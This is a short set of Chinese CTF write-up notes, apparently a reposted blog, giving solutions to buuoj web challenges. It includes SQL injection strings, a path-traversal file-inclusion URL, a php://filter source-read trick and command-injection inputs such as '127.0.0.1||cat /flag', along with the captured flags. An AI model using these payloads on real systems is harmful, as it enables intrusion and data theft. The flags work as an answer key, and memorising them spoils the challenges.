buuoj WEB做题笔记
[极客大挑战 2019]EasySQL
password输入存在注入: 123'or 1=1 --'
flag{68144110-18b9-4882-93f1-6f6e7b1c67ec}
[极客大挑战 2019]Havefun
看网页源码,发现尾部有一段注释得代码,尝试 /?cat=dog,回显得flag{01c680f5-0d62-4e2c-a805-cfcf6b9252db}
[极客大挑战 2019]PHP
根据页面提示“我有一个良好的备份网站的习惯”,从网站下载www.zip,发现flag.php,得:Syc{dog_dog_dog_dog}
[HCTF 2018]WarmUp
看页面源码发现有source.php和hint.php。访问source.php,可以看到源码。
/source.php?file=source.php%253f../../../../../ffffllllaaaagggg
flag{4e32d761-238a-429a-88b9-eec7fdaea63f}
October 2019 Twice SQL Injection
审计源码。
1> 使用 1' union select group_concat(table_name) from information_schema.tables where table_schema=database() # 作为用户名,注册,然后登陆,获得三张表名:flag,news,users
2> 使用 1' union select concat(flag) from flag # 作为用户名,注册,然后登陆,获得flag
flag{fa7f6f08-c2cc-4c72-8ed7-1993959cd35c}
[ACTF2020 新生赛]Include
/?file=php://filter/read=convert.base64-encode/resource=flag.php
[ACTF2020 新生赛]Exec
127.0.0.1||ls / #查看根目录
127.0.0.1||cat /flag #flag{52d81535-4467-4429-ae0e-ad751e78e6a3}原文地址:https://blog.csdn.net/lakeside1/article/details/143934420
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!